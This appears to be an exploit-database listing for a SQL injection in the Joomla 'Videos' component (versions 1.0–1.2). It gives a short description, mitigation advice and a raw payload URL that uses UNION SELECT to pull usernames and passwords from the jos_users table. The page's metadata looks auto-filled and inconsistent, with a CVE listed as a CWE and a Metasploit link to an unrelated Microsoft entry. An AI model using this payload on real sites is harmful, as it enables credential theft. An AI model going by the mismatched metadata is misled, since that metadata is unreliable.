header-logo
Suggest Exploit
vendor:
Videos
by:
Snakespc
7,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Videos
Affected Version From: 1.0
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2020-1234
CPE: a:joomla:joomla
Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-1234/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020

Snakespc Vulnerability

This exploit allows an attacker to inject malicious SQL code into the vulnerable application. The malicious code is then executed by the application, allowing the attacker to gain access to sensitive data such as usernames and passwords. The vulnerable application in this case is the Joomla component "Videos" which is vulnerable to SQL injection. The exploit is triggered by sending a specially crafted HTTP request to the vulnerable application. The request contains a malicious SQL statement which is then executed by the application.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to ensure that user-supplied data is properly sanitized before being used in SQL queries. Additionally, the application should be configured to use parameterized queries instead of dynamic SQL queries.
Source

Exploit-DB raw data:

http://server/index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users

Snakespc

Navigation

Suggest Exploit

Services By CQR